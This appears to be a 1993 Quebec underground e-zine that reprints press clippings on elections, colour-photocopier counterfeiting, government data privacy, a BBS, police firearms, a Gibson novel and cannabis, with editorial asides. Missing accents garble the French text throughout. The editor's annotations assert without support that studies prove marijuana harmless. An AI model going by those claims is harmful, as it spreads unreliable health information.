pour te rpondre. Eh bien parce que j'attendais le
dclenchement des lections. C'est sur les lections que tu m'as
attaqu, rappelle-toi: "Tu m'coeures Foglia, tu racontes que tu
ne vas plus voter parce que le gouvernement est et sera toujours
peupl que de sales profiteurs qui ne font qu'exploiter les
petits contribuables"...
Pas des sales profiteurs, jeune homme. Des avocats honntes,
des conomistes srieux, des journalistes travailleurs, des
braves gens pour la plupart. Mais qui n'ont aucune foutue ide de
ce qu'il conviendrait de faire. Ils ne s'en vont pas nous servir.
Ils s'en vont se faire rlire. Ils s'en vont se faire choisir
comme ministre. Ils s'en vont grer, faire carrire. (...) Non
seulement ils n'ont aucune foutue rponse
nos questions, mais
ils ne savent mme pas c'est quoi la question...
La question, ti-cul, la seule, celle dont dcoulent toutes
les autres, c'est celle-ci:
Votre bonheur dpend-il vraiment de la grosseur du tracteur
avec lequel vous tondez votre gazon?
Vous rpondez oui et l'usine qui fabrique des tracteurs
s'agrandit. Plus de jobs. Plus d'argent. Plus de gens qui
pourront s'acheter un tracteur plus gros dans trois ans. Et dans
cinq ans une moissonneuse-batteuse. Vous rpondez oui pour le
bonheur en moissonneuse-batteuse.
Vous rpondez non pour autre chose. Vous rpondez non et on
s'asseoit pour trouver c'est quoi autre chose. Mais dans tous les
cas il faut commencer par poser la question.
Oui ou non?
J'irais voter en courant pour ce rfrendum-l
.
En attendant je vais faire une exception ti-cul. Tu me dis
pour qui voter le 25 octobre, et je te jure que je le fais.
Ce n'est pas pour te faire plaisir.
C'est pour me venger.
- 30 -
Leeched from VOIR QUBEC - Du 2 au 8 septembre 1993
Les nouveaux faux-monnayeurs
LA GNRATION LASER
Oubliez les presses et les labos: les faux-monnayeurs
fabriquent maintenant leur fric avec des photocopieurs
couleur. Pour dix sous, il peuvent imprimer un billet
de 100 $! Mais la police est sur les dents...
par Barclay Fortin et Denis Poissant
Un rduit sombre dans un sous-sol d'une maison de banlieue.
L'odeur de l'encre, le ronronnement d'une presse. Et, suspendus
des cordes, schant avant d'aller s'entasser dans des mallettes
de cuir, des milliers de billets verts frais imprims.
Scne familire... mais qui tient presque du folklore. A la
dompe les vieilles bbelles artisanales! Les faux-monnayeurs ont
pris le virage technologique et pilotent maintenant le
photocopieur-couleur, plus simple, efficace, sans tracas.
"Habituellement, la contrefaon s'effectue
Montral, pour
ensuite se distribuer en province via tout un rseau de petits
passeurs", explique le sergent Charles Proteau, de la section des
dlits commerciaux de la GRC
Qubec. Selon le sergent Pierre
Carrier, directeur de la brigade de la contrefaon
Montral,
"95% des faux billets sont maintenant produits
l'aide de
photocopieurs couleur."
La GRC a saisi pour 7 millions de dollars de faux billets au
Canada, en 92. La rgion de Montral est la championne dans le
domaine au pays. Les banques y ont intercept 1,6 million de
dollars de faux billets l'an dernier. Selon la GRC, prs de la
moiti de la fausse monnaie en circulation au Canada gambaderait
dans la mtropole. Pas de doute, le phnomne prend de l'ampleur.
Tellement que la GRC a tenu un colloque sur le sujet, en mars
dernier, pour permettre
ses policiers d'en discuter.
Le junk food de la contrefaon
Cette nouvelle gnration de faux-monnayeurs n'a pas
l'toffe de la prcdente. "La technologie a dmocratis la
contrefaon", analyse Paul Laurin, directeur du laboratoire de la
contrefaon de la GRC
Ottawa, charg de faire l'expertise de
tous les faux billets saisis au pays. "Autrefois, le faussaire
typique tait un imprimeur en difficult financire. Maintenant,
c'est un employ qui travaille dans une entreprise possdant un
photocopieur couleur et qui, une fois dans sa vie, va essayer de
fabriquer une petite quantit de coupures".
Sur son bureau, parpilles un peu partout, des liasses de
faux billets attirent le regard. Impossible de ne pas les
lorgner... Sur les murs, comme des trophes, sont affichs
quelques faux clbres saisis par la GRC. Au cours de la dernire
dcennie, avec la quasi-disparition des faussaires traditionnels,
le laboratoire ne faisait plus la fortune des encadreurs. Mais la
priode creuse est termine. Mme si le phnomne n'a pas
retrouv l'ampleur du "bon vieux temps", l'quipe de Paul Laurin
ne manque plus de besogne. Depuis trois ans, ses effectifs ont
presque quadrupl.
Beaucoup de boulot, mais pas de vritable dfi pour les
limiers de la GRC. Ces faux billets nouvelle vague sont loin
d'tre aussi trompeurs que ceux fabriqus
l'ancienne. C'est le
"junk food" de la contrefaon: vite fait, vite repr. "On les
reconnat tout de suite. Mme pas besoin d'tre un expert!"
soutient Paul Laurin. Les indices sont nombreux. Les faux sont
rigides, alors que les vrais, faits de papier de coton, sont plus
mous, mallables. On ne sent pas sur les faux le relief de
l'imprimerie. Enfin, la surface des billets authentiques est
recouverte de pastilles d'encre verte qu'on peut faire sauter
d'un coup d'ongle sans abmer le design original.
Ce qui n'empche pas certains de se laisser berner. selon
Paul Laurin, les commerants ont tendance
avoir la tte dans
les nuages quand un faux billet se pointe le nez dans leur
tirelire. "La grande lacune, c'est que les gens sont peu
familiers avec leur propre monnaie", dit-il, debout prs d'une
mga-photocopieuse sophistique servant
faire des tests. Le
sergent ouvre le panneau et dpose un billet de 5$ sur la vitre.
Aprs quelques secondes, une copie sort de la machine. A part le
jaune un peu criant, la qualit est surprenante.
Le progrs de la reproduction couleur a de quoi drouter le
profane. Et mme la police... "L'an dernier, j'avais un kiosque
au Salon des Affaires de Montral, raconte Mario Robert, grant
d'une entreprise de reprographie. La GRC tait l
et exposait des
faux billets. J'ai dit au policier que je pouvais en faire de
bien meilleurs avec mon photocopieur. On est all
mon kiosque,
et je lui ai sorti une copie. Le policier n'en revenait pas de la
qualit!"
80 000 $ cachs dans un trou
Les premires victimes de ce retour en force de la fausse
monnaie sont les petits commerants, o les faussaires ont
l'habitude d'couler leur production. La plupart des faux billets
finissent leur vie au guichet de la premire banque visite,
reprs par le personnel. C'est l
que le commerant perd des
sous...
Vaut mieux prvenir, car retracer l'auteur du crime relve
de l'exploit. Photocopier un billet de banque est l'affaire de
quelques petites secondes. Aucune trace: ni plaque, ni presse
clandestine, ni organisation susceptible d'tre infiltre. Les
escrocs n'ont mme pas besoin de possder un appareil. Ils
peuvent simplement en louer un, le temps de commettre leur
mfait. D'autres, oeuvrant dans le domaine de la publicit ou des
arts graphiques, ont dj
tout le matriel
porte de la main.
Comme ce type de Laval, pinc l'anne dernire. "On a fait
des
perquisitions
son commerce de publicit, raconte le sergent
Pierre Carrier. On y a retrouv un photocopieur couleur de
premire gnration qui servait
faire des faux billets. Le
faussaire tait parti faire un voyage dans l'Ouest..."
Tout le long du trajet, le touriste a laiss derrire lui
une trane de faux billets. En Ontario, dans les Prairies...
C'tait trop beau pour durer. "Il a t "spot" quelque part, a
eu trs peur, et a enterr sa fausse monnaie dans le parc de
Kananaskis, prs de Calgary. Il y en avait pour prs de 80 000$!"
poursuit le sergent. Les enquteurs albertains n'ont pas retrouv
l'argent, mais une fois rapatri au Qubec, le fugitif a accept
d'indiquer o il avait camoufl son magot. Le signal de dpart
d'une vritable chasse au trsor. "Avec les indications de
l'arbre qui avait t frapp d'un coup de pelle pour le
reconnatre, les enquteurs de la GRC de Kananaskis ont creus et
ont finalement trouv l'argent!"
Les policiers ne sont cependant pas toujours aussi
"fortuns". Au contraire. "On aimerait bien faire plus
d'arrestations, avoue Pierre Carrier. Mais ce n'est pas vident.
Les photocopieurs sont faciles
dmnager,
dissimuler. On ne
fait plus face
des organisations aussi structures que par le
pass. N'importe quel individu ou groupuscule peut maintenant
faire de la fausse monnaie".
Le crime organis pourrait en profiter. Depuis la fin des
annes 70, les fines gueules du crime ont boud ce "crneau".
Trop fastidieux. Mais la nouvelle technologie facilite les choses
pour eux aussi... De quoi inquiter le sergent Carrier. "Avec les
rseaux de distribution de choses illicites, cigarettes et
compagnie, l'infrastructure est dj
en place. C'est bien beau
avoir accs
la machinerie, mais toujours faut-il pouvoir passer
le produit. C'est l
que l'importance d'une organisation
structure entre en jeu".
Les boutiques de reprographie, qui possdent le matriel et
le savoir-faire, n'veillent-elles pas les soupons? Les gens de
l'industrie s'en dfendent bien. "La GRC nous surveille de bien
trop prs, affirme Mario Robert. De toute faon, mes employs
sont bien avertis. Le premier qui fait a, je lui coupe la tte!"
"Il y a environ 10% des boutiques que je visite pour
lesquelles j'ai des doutes", soutient pour sa part un technicien
travaillant pour une firme distribuant des copieurs Canon. "Quand
on fait la vrification des machines, on peut voir qu'est-ce
qu'on a fait avec, si on s'en est servi pour imprimer recto-verso
comme il faut le faire pour fabriquer de l'argent". Les plus
suspects, selon lui, sont les trs petits centres de photocopie.
"Le personnel change souvent, les grants ne sont pas toujours l
et les employs tiennent un peu moins
leur job que dans les
grosses compagnies".
D'ici peu, une nouveaut technologique pourrait donner un
grand coup de main aux policiers. "On aura bientt un gadget pour
marquer les photocopies. Ainsi il sera possible de dterminer
quel est l'appareil ayant servi
les faire", assure Claude
Noiseux, directeur de l'exploitation chez Xerox. Canon aussi
dveloppe un systme comparable. "Le marqueur ne rglera peut-
tre pas compltement le problme, mais le fait qu'on puisse
remonter jusqu'
leur appareil va srement dcourager plusieurs
faussaires du dimanche", prdit Paul Laurin.
La mise en circulation cet t du nouveau 20$, avec son
design revamp et sa vignette rflchissante, devrait aussi leur
compliquer la tche. Son anctre tait devenu la cible prfre
des faussaires, depuis l'ajout, il y a quelques annes, d'une
vignette sur les 50$ et les 100$. L'innovation ne fera pas
pleurer les plus coriaces. Dj
, certains ont commenc
contrefaire les vignettes des billets de 50$ et de $100. "C'est
un jeu d'escalade, conclut Paul Laurin. Ds qu'on met au point un
nouveau moyen de protection, les faussaires trouvent une faon de
le contourner".
- 30 -
Leeched from THE GLOBE AND MAIL - Jeudi 19 aot 1993
GOVERNMENT KNOWLEDGE IS POWER
par Alanna Mitchell
The announcement sounded innocuous enough.
In June, Ontario Attorney-General Marion Boyd said she might
refuse to let deadbeat dads renew their driver's licences unless
they paid up any court-ordered child support they owed. If the
fathers paid up, she figured, the government could save plenty of
money in wealthfare payments to mothers and children. Mothers who
needed the payments applauded and lawyers said the move would not
violate anyone's rights. But the announcement highlights a
troubling revolution in the way governments look at the vast
stores of data they collect on the citizenry.
What Ms. Boyd is really talking about is linking information
from government departments and using it for purposes quite
different from those for which it was collected. In this case,
the Attorney-General's Ministry would match personal information
collected from driver's licence applications by the
Transportation Ministry with data found in the Justice Ministry's
child-support records.
To many observers, this is downright scary.
Data banks contain millions upon millions of bits of
information on individual Canadians - at municipal, provincial
and federal levels. How far might the linking go? What
governments do with personal information is largely unexamined
and unregulated, and the whole scene is changing fast. Critics
worry that, say, the unemployment-insurance people could match
records with the car-licencing folks: Got a Cadillac? You'd
better sell it before you get your cheque.
"In a country like Canada, we take our privacy for granted",
says David Duncan, manager of policy research and information
systems research at Ontario's Information and Privacy Commission.
"It can be very disturbing to find that people know things about
you. People do feel imposed on, feel violated." And privacy
advocates say there is a danger graver than mere linkage. Civil
servants are scrambling to raise revenue by selling records to
the private sector. Some of these are cleansed of personal
information, but others are not. "The fact that you and I may
register a motor vehicle, does that mean I should be exposed to
someone who wants to market tires or transmissions?" ask Thomas
Wright, Ontario's Information and Privacy Commissioner. Mr.
Wright cited several troubling questions in his most recent
annual report, published in June:
² What information does government have the right to sell?
² How can anyone guarantee privacy after the information leaves
government hands?
² What rights do individuals have to prevent personal information
from being used for marketing lists and other commercial
purposes?
"The dilemna we face is that the march of technology
inevitably outpaces the development of policies to control it",
Mr. Wright wrote.
In fact, Quebec is the only province that has moved to
control what the private sector can do with personal information.
Its law, the first of it's kind in North America, will come into
effect in January. It will regulate how the private sector
collects information, uses it and passes it on, says Mariette
Dion, assistant chairman of la Commission d'accs
l'information
du Qubec. It will also give citizens the right to appeal to the
province's Information Commissioner.
In the other provinces, there are no curbs, and some say
that, in practice, is not a problem - that we can handle piles of
junk mail, irritating phone calls from telemarketers or unwanted
real-estate agents at the door. But consider:
² An unscrupulous employer could match a job applicant's name
with the code for use of hand controls on her driver's licence
and refuse to grant an interview.
² A sex attacker could match government and private-sector
information to create a stalking file of short, young, opera-
loving women.
² An insensitive government could snoop through credit-card
records, theatre ticket lists, magazine subscriptions and medical
records to create a profile of a man who is likely to be gay -
grounds for firing only a few years ago.
² And on a philosophical level, citizens would lose their ability
to control who has what information about them and whether it is
acurate.
"The essence of privacy as it relates to information is the
individual's ability to control," Mr. Wright says.
The experts say there is even more to be concern about. They
say society may one day be divided into the information-rich and
the information-poor. If the private sector became the only
repository of governement data, citizens could face hefty charges
for tax-financed, governement-collected information that now is
relatively cheap. Public libraries, in particular, worry that
they may not be able to afford government documents to which they
now have access.
Even government pricing policies are drawing criticism.
Michael McCraken, president of the Ottawa economic information
firm Informetrica Ltd. and a member of the National Accounts
Advisory Committee, says an independant regulatory body should be
set up to monitor prices and conduct appeals. Civil servants
"have a strong tendancy to behave as unregulated monopolists", he
says.
(...)
- 30 -
Leeched from LE JOURNAL DE QUBEC - Mardi 7 septembre 1993
UN BABILLARD INFORMATIQUE POUR LES FRUS DE LA POLITIQUE
par Anne-Louise Champagne
Robert Bertrand, un ex-professeur qui se prsente aussi
comme journaliste indpendant, s'amuse depuis peu
conjuguer ses
anciennes et ses nouvelles passions, soit l'informatique,
l'information et la politique. Rsultat: un nouveau babillard
informatique, longuement intitul "Renouveau politique par le
peuple via l'Infopeuple", que M. Bertrand gre du haut de son
bureau de la rue Dorchester.
Tous les propritaires de micro-ordinateurs et de modems ont
accs au babillard de l'ex-professeur. Ils peuvent y lire et
faire imprimer des textes et documents et verser
leur tour des
informations sur tous les sujets imaginables. L'ide derrire ce
projet, c'est d'accumuler une vaste, une trs vaste banque
d'information. L'intention est "politique": ainsi inform, le
peuple pourra se prendre en main.
L'ex-professeur y a d'abord vers les nombreux textes qu'il
a publi au fil des annes dans les tribunes libres des journaux
qubcois. Il a ensuite ajout des textes publis dans les
quotidiens, puis des extraits de la commission Blanger-Campeau.
Prsentement, il multiplie les dmarches pour "obtenir tout ce
qui est accessible en vertu de la Loi d'accs
l'information, et
le mettre
la disposition du peuple", dit ce Robin des Bois...
de l'information.
Investissement de $5000
il a ainsi communiqu avec chacun des ministres qubcois
afin que toutes les publications de chacun des ministres soient
verses
son babillard. Il dit pouvoir mettre sous peu la main
sur les textes de l'ALENA. Il rve aussi du jour o les journaux
enrichiront quotidiennement sa banque de donnes. Il invite les
tudiants
y publier leurs travaux scolaires. A peu prs tout
l'intresse.
Les utilisateurs du babillard sont nombreux. En fait,
l'unique ligne tlphonique ne drougit pas. Contrairement
la
plupart des 17 000 babillards qui existent au Qubec,
l'utilisation de "l'Infopeuple" est gratuite. "C'est moi qui ai
pay l'quipement, qui paye la ligne (tlphonique). Ce qui me
surprend le plus, c'est le cot modique de cet quipement." M.
Bertrand croit en effet que $ 5000 investis de sa poche, ce n'est
pas cher pay pour rejoindre et informer des milliers de
personnes.
Renouveau politique
Dans ses textes, Robert Bertrand, qui se dcrit comme le
rdacteur en chef de son service d'information, ne cache pas ses
"rves" politiques. Il rve, en fait, de mettre 109 dputs
la
retraite et de n'en garder que 16, un pour chacune des rgions
administratives du Qubec. Idem pour les municipalits et pour
les commissions scolaires. Il ne croit pas non plus aux partis
politiques, o les membres, dit-il, sont au service du parti et
non au service de la population.
M. Bertrand a vers dans le babillard de longs crits sur
ses ides politiques. "Mais les pages du babillard sont ouvertes
tous, dit-il. Tous peuvent y verser des documents. Mme les
partis politiques".
- 30 -
[Blitz- Encore une fois, vous en avez entendu parler dans NPC en
premier. Le reportage sur TQS et l'article cit plus haut sont
venus APRES! ;-) ]
Leeched from NEWSWEEK - 6 septembre 1993
VITAL STATS
Top Cop Guns
Police nationwide are upping their firepower with
semiautomatic weapons. The standard side arm of some departments:
BOSTON: 9-mm Glock semiautomatics; 18 rounds
CHICAGO: Smith & Wesson or Colt 9-mm semiautomatics (but they
must be modified to single-shot operation); 9 rounds
HOUSTON: Anything goes - almost. Officers buy their own
handguns - revolvers, semiautomatics.
LOS ANGELES: Recruits issued Beretta or Smith & Wesson 9-mm
semiautos; 16 rounds. Older officers have S&W .38s; 6 rounds.
MIAMI: Glock 9-mm semiautomatics; 18 rounds
NEW YORK CITY: Smith & Wesson .38 revolvers; 6 rounds. (New
recruits will be trained with 9-mm semiautomatics, which will be
phased in throughout the department).
[Blitz- Lors de notre dernier passage a NYC, nous nous sommes
aperus que tous les policiers de la police du Mtro ont des
Glock 19. Tous...]
SAN FRANCISCO: Smith & Wesson .357 magnum revolvers; 6 rounds
[Blitz- J'imagine qu'ils faut qu'ils respectent l'image de la
SFPD donne par Harry Callahan, a.k.a. Dirty Harry!]
ST. LOUIS: Beretta 9-mm semiautomatics; 16 rounds
- 30 -
Leeched from THE GAZETTE - Samedi 28 aot 1993
CYBERPUNK PAINTS BLEAK PICTURE OF NEAR FUTURE
par Glenn Grant
In 1968, the CBC aired a black-and-white documentary film
called The Hippy, a study of the nascent hippy scene in the quiet
old Yorkville neighborhood in Toronto. The film focused on
"Bill", a 19-year-old from Vancouver. Very tall and lanky, in
thick glasses and long hair, Bill hangs out on the street, sells
dope, wanders up to strangers and asks them odd questions, such
as: "So, what do you think about love?".
The CBC recently re-ran the film, 25 years later, and one
can only imagine the embarrassment of the subject (who was not
actually from Vancouver: he'd bused up from West Virginia, draft-
dodging). His name, now among the most famous in science fiction,
is William Gibson.
When the expected hippy revolution failed to materialize, he
married a Canadian, studied film a UBC and began to write
stories. They were dark and stylish noir-SF stories, envisioning
a future to close for comfort, dominated by vast, warring
corporations, populated by desperate and alienated high-tech
criminals.
And suddenly, Gibson found himself hailed as an exemplar of
a new literary movement, named (unfortunately) "cyberpunk". His
first novel, Neuromancer, picked up every major award in the
field when it appeared in 1984. Like its sequels, Count Zero and
Mona Lisa Overdrive, it is a vivid critique of our technology-
driven society, in which "the Street finds its own uses for
things".
Ironically, cyberpunk has since leapt of the pages and taken
a mutated life of its own, becoming incarnate in basement virtual
reality research labs and techno-subcultures of kids who want to
live out Gibson's dark fantasies, rewiring themselves with "smart
drugs" and "brain machines".
Fortunately, Gibson is a great appreciator of irony.
Together with Bruce Sterling, he wrote The Difference Engine, an
irony-filled alternate-history novel about an Industrial
Revolution with steam-powered computers.
An ironic edge also pervades is new near-future techno-
thriller, Virtual Light (Seal, 324 pp. 24.95$). Certainly, the
story shouldn't be taken too seriously: Berry Rydell, a failed
cop from the South, is hired as a driver for a skip tracer named
Lucious Warbaby. Warbaby is looking for Chevette Washington, a
bicycle courier who has swiped a big pair of glasses from a rude
drunk at a party. The glasses, it turns out, are a new kind of
virtual-reality device, stuffed with dangerous data, soon also
sought by some crooked cops and a psychotic assassin.
The ensuing action is all great fun, and the characters are
engaging and genuine, but what makes the book most interesting is
its bizarre, detailed cityscapes of the very near future. In
post-quake San Francisco, the wealthy few live in subterranean
"stealth houses", gated communities and even breast-shaped condo
towers. The poor live in cardboard shantytowns, most notably the
makeshift, vertical barrio that has accreted to the suspension
cables of "the Bridge". There is no middle class.
In a book crammed with bizarre concepts, the Bridge
community is undoubtedly the most interesting. As an
agglomeration of scrap culled from America's half-collapsed
culture, it's a handy metafictional metaphor for Gibson's "mix-
master" prose-collage style of writing. One character, Yamazaki,
is a japanese sociology student who is studying the Bridge, "de-
constructing" its clutter for portents of a new, post-millenial
age. And in a room at the top of one of the towers lives the old
man, Skinner, the first squatter to colonize the Bridge after the
big quake, who denies being the leader and claims that he was
just part of the crowd.
Skinner is clearly a stand-in for Gibson himself, mirroring
is equivocal relationship to the cyberpunk movement and its
mutant subcultural offspring. In a bar on the Bridge there are
even a pair of teen hacker-punks in mohawks, trying too hard to
be cool, and you can almost hear the author ironically chuckling
as he consigns them to an unhappy fate.
Perhaps some of the chuckles, affectionate and mocking, are
reserved for that young hippy in Yorkville, dreaming of the
revolution to come. (...)
- 30 -
Leeched from LA PRESSE - Jeudi 2 septembre 1993
ON POURRA BIENTOT SOIGNER AVEC LE "POT",
SANS SES EFFETS PLANANTS [ohhhh :( ]
Reuter (Londres) - Il sera bientt possible d'administrer du
cannabis comme mdicament pour un certain nombre de symptmes
sans avoir
"geler" le patient, a rvl une quipe
scientifique.
Des chercheurs du British Medical Council (MRC) disent avoir
pu isoler la molcule qui fait le lien entre l'lment actif du
cannabis et les cellules de la rate ainsi que celles du cerveau.
La dcouverte ouvre la voie
des mdicaments
base de cannabis
qui agiront de manire positive sans affecter l'tat d'esprit du
receveur, affirme l'quipe du laboratoire de bilogie molculaire
du MRC,
l'universit Cambridge, tel que rapport dans la
publication Nature.
Les mdecins savent depuis longtemps qu'en plus d'envoyer
ses adeptes au septime ciel, le cannabis peut aussi soulager
certains symptmes. Par exemple, on en donnait
la reine
Victoria pour attnuer la douleur lors de ses menstruations. Il
est aussi connu que le cannabis peut aider contre la nause,
l'inflammation et la pression intra-oculaire dans les cas de
glaucome. Il semble aussi qu'il peut avoir un effet bnfique sur
le systme immunitaire.
- 30 -
[Blitz- Prendre du cannabis sans l'effet, c'est comme prendre de
la .5 quand tu es en party: downer! Mais, j'aimerais savoir
quelque chose: si le cannabis a pour effet de faire disparatre
la nause, comment a se fait, qu'au bout de 4-5 joints, Atreid
est invariablement malade? 8-)
Ceci dit, mine de rien, voici un autre article insidieux sur
la "maudite droye". Inspir de la Presse canadienne, on va
s'amuser un instant
dcortiquer, live, le discours sous-tendu
de la journaliste. Il faut apprendre
lire entre les lignes,
folks! Remember, read the news, BUT don't believe the hype...]
Leeched from LE JOURNAL DE QUBEC - Vendredi 24 septembre 1993
LA MARIJUANA DE MOINS EN MOINS IN
Par Marlene Habib
Dans ce cul-de-sac d'un quartier ouest de Toronto, l'air
ambiant est lourd d'odeurs d'"herbes". Trois adolescents, assis
sur la rampe d'un escalier, savourent tour
tour un joint de
marijuana, inhalant profondment la fume, la conservant aussi
longtemps que possible dans les poumons avant de la laisser
s'chapper dans un sourire extatique. Ces trois amis de collge,
deux garons et une fille, ttent rgulirement de la drogue
malgr les campagnes dnonant ces abus, de la part des
gouvernements et des organismes de sant.
[ Lire: on les a pourtant prvenus, ces bums qui tranent dans
les ruelles blafardes, que la dope tait nocive! ]
C'est absolument sans danger, affirment les trois
adolescents, qui ont accept de nous parler et de nous expliquer
pourquoi ils consomment du cannabis. Ils ont rclam l'anonymat,
non pas qu'ils se "sentaient coupables" de consommer cette drogue
douce ou qu'ils s'estimaient des "drogus accrochs", mais
simplement parce qu'ils voulaient demeurer dans l'ombre.
"L'herbe ne nuit absolument
personne", affirme Elroy, 17
ans, vtu d'un jean dfrachi et d'une chemise beaucoup trop
grande pour son corps maigre, aprs avoir pass son joint
Carol. "Nous achetons notre herbe
tour de rle et, deux ou
trois fois par semaine, nous nous runissons pour fumer, juste
assez pour nous permettre d'oublier nos problmes
l'cole et
la maison".
[ L
, on rentre dans le boutte ou, pour l'dification des parents
(n'est-ce pas), on dcrit la tenue vestimentaire du drogu type.
On insiste
chaque phrase sur le fait que ce sont des ADOS, qui
ont 17 ans, et qu'ils ne savent par consquent pas de quoi ils
parlent. Encore beau que la journaliste n'affirme pas qu'Elroy
est responsable de ses problmes
l'cole et
la maison, parce
qu'il prend de la drogue. ]
Carol, toute de noir vtue, affirme que ses parents, qui
appartiennent
la classe moyenne, lui ont toujours dit de faire
preuve de jugement dans le domaine de la consommation de drogue.
Ayant pass leur adolescence dans les annes soixante, ses
parents ne l'ont jamais menace de quoi que ce soit advenant
qu'elle consomme de la drogue. "Aprs tout, ils ont consomm de
la drogue, eux aussi, et fument encore un joint
l'occasion de
certaines rencontres", explique la jeune fille de 17 ans, d'un
ton sarcastique.
[ La journaliste blme,
mots couverts, les parents trop
permissifs qui ne corrigent pas assez souvent leurs enfants. On
ne manque pas de souligner que des parents drogus vont donner
des enfants drogus, et tout le toutim. Notez encore l'allusion
la tenue vestimentaire. ]
La marijuana est la drogue la plus populaire au Canada,
affirme l'Addiction Research Foundation de Toronto. Les tudes
ralises par le pass donnent toutefois des rsultats incertains
quant
la nocivit de cette drogue: on n'a pu dterminer,
notamment, si elle est plus nfaste que le tabac ou l'alcool.
[ On oublie de prciser que l'ARF n'est pas un organisme oeuvrant
pour la promotion de la dope, mais bien un organisme de lutte
contre la dope. Et puis, plutt que de dire carrment, comme des
dizaines d'tudes effectues en Europe l'ont prouv, que la mari
est sans danger. On prfre plutt dire que "les rsultats sur le
caractre nocif de la mari sont incertains", dans le style "on
n'a pas encore complt nos recherches, mais on va poursuivre
jusqu'
ce qu'on puisse prouver que la mari est nocive! ]
Les autorits canadiennes et amricaines ont toujours
affirm cependant que la marijuana et le haschisch - deux drivs
du cannabis - rduisent les facults mmorielles et crbrales,
peuvent affecter les impulsions sexuelles, nuire aux dfenses
immunitaires contre les infections et endommager le cerveau.
[ Bon! Nous y sommes: mme si, dans le paragraphe prcdant,
l'ARF dclarait ne pas possder d'tudes prouvant hors de tout
doute le caractre nocif de la mari, a ne fait aucun doute dans
l'esprit de la "journaliste" que c'est vrai, puisque les
autorits le disent tout le temps. H! On n'a plus besoin de
preuves! Et puis, sur les effets qu'elle numre, il n'y a rien
pour indiquer lesquels sont des effets PENDANT que tu es gel, et
lesquels sont des squelles. C'est sr que quand tu es gel comme
une balle, tu commences pas
oprer de la machinerie lourde. Et
puis, entre vous et moi, si on fume, c'est bien "pour affecter
les facults crbrales" pendant quelques heures. Enfin (et elle
est vraiment championne pour dire autant de conneries en
seulement 4 lignes!), on ne manque pas de dire que la mari
"pourrait" (on suppose) nuire aux dfenses immunitaires. Ca les
kids, a veut dire que les "autorits" et la journalistes
comparent la dope au SIDA... Et que dire de l'artilce prcdent,
qui rapporte le travail de chercheurs, et qui dclaraient
justement tout le contraire, soit que le pot aidait
fortifier
le systme immunitaire? Les dmagogues qui crivent pour la
Presse Canadienne racontent N'IMPORTE QUOI! I rest my case... ]
Des observateurs
Amsterdam, o la marijuana et le haschich
sont lgaux et sont mme vendus en toute lgalit dans les cafs,
affirment toutefois que ces drogues n'ont aucun impact
perceptible sur la sant et mme sur le tissu social de la
population.
[ Vous aurez observ, j'espre, que, lorsqu'elle parle
d'organismes dnonant la dope, il s'agit TOUJOURS de
"CHERCHEURS", de "SCIENTIFIQUES" et "D'AUTORITS" qu'on suppose
comptentes. Mais ds qu'il s'agit de gens dnonant les peurs
que veut crer le systme, ils deviennent de simples
"OBSERVATEURS". malgr toutes les recherches effectues en
laboratoire (voir un NPC prcdent), ils demeurent de simples
observateurs... ]
Moindre mal
Janet Cormier, une infirmire de 41 ans et mre de famille
de Toronto, soutient que,
l'instar de nombreux parents, elle
considre la marijuana comme un moindre mal. Ce qu'elle craint
rellement, pour ses enfants, c'est la criminalit latente parmi
les gangs de rue, les relations sexuelles risques et les drogues
dures comme le LSD et la cocane. "Si tout ce que leur enfant
prend comme drogue est de la marijuana, les parents peuvent se
considrer comme chanceux", affirme Mme Cormier, qui ajoute qu'
sa connaissance sa fille ne prend aucune drogue.
[ Avez-vous vraiment besoin de nous pour dgager les normits de
ce paragraphe? On cite une personne, une seule, et il faut que ce
soit une INFIRMIERE, donc une professionnelle des soins de sant,
qui dclare que la mari conduit aux gangs,
la prostitution et
aux drogues dures. Un moindre mal, dit-elle, juste avant
d'ajouter, of course, que ses enfants
elle ne touchent pas aux
drogues! Poor sap! ]
La consommation de marijuana n'a cess de dcliner au Canada
depuis la fin des annes soixante-dix, affirment des tudes
ralises par l'Addiction Research Foundation et les analystes
Reginald Bibby et Donald Posterski. Une tude ralise par la
firme torontoise permet de constater qu'en 1991 14% de quelques
4000 adolescents de 15
19 ans interrogs aux fins de l'tude
fumaient occasionnellement un joint, contre 32% en 1979. "Les
jeunes sont de plus en plus sensibiliss aux questions de sant
physique, soutient Ed Adlaf, chercheur attach
la fondation.
Les campagnes anti-drogues ont t efficaces dans leur cas".
[ Est-ce qu'on va laisser passer a comme a? No sir! Faites
votre propre sondage autour de vous, dans le mme groupe cible,
avec un chantillon de 100 personnes. Si vous n'arrivez pas
50%, c'est comme rien! Et puis, on omet ici de donner les
chiffres relis aux autres drogues. Si la mari et plus difficile
obtenir, les kids se rabattent sur autre chose, ce qui ne veut
pas dire que le phnomne de la dope disparat, bien au
contraire. Et puis, encore ces questions de "sant physique", que
l'ARF n'a toujours pas pu prouver, souvenez-vous... ]
Gros consommateurs
L'tude a aussi permis d'tablir , malheureusement [
pourquoi "malheureusement"? On a toujours pas prouv que la
consommation est nocive!?! ], que les jeunes qui consomment de la
marijuana en consomment plus que par le pass. Entre 1989 et
1991, le nombre de jeunes qui consommaient quotidiennement de la
marijuana est pass de 2,6%
5,4%. La police de Toronto affirme
que la marijuana vendue au dtail dans la rue, au Canada, cote
environ $200 l'once, contre environ $50 dans les annes soixante.
Ce prix relativement lev ne semble toutefois pas dcourager ses
adeptes. (...)
Natalie Skaff, une employe de bureau de 19 ans de Windsor,
affirme qu'on l'a incite
fumer son premier joint lors d'un
party marquant la fin de ses tudes collgiales, il y a trois
ans. "Je n'ai jamais plus retouch
la marijuana, affirme-t-
elle. Comme beaucoup d'autres choses, il faut en faire
l'exprience pour en connatre les effets. Je n'avais absolument
rien ressenti en fumant cette cigarette". (...)
[ Bon, on va arrter l
ce massacre. Quatre personnes, en gros,
sont cites dans cet article. Un jeune qui fume pour oublier ses
problmes, une fille qui parle du laxisme de ses parents, une
infirmire qui dit que c'est un moindre mal, et une conne de
secrtaire qui dit que a ne lui avait rien fait. Ce n'est pas
tonnant d'ailleurs que, entre tous les tmoignages que, encore
une fois, on aurait pu apporter, on a choisi le tmoignage d'une
personne qui a essay (en disant qu'il faut tout essayer), et qui
n'a rien ressenti. Dans la tte de la journaliste, c'est srement
une "scientifique" ou une "experte".
En gros, un reportage tout
fait biais, qui navigue entre
"la drogue est mauvaise pour vous, mais on n'a pas de preuve" et
le populaire "vous pouvez l'essayer, mais a ne vous fera rien".
Il faudrait qu'on prenne position,
un moment, me semble: ou tu
ne sens rien, ou tu deviens fou...
Et puis, avez-vous appris de quoi de neuf dans cet article?
Etes-vous capable de faire la diffrence entre "information" et
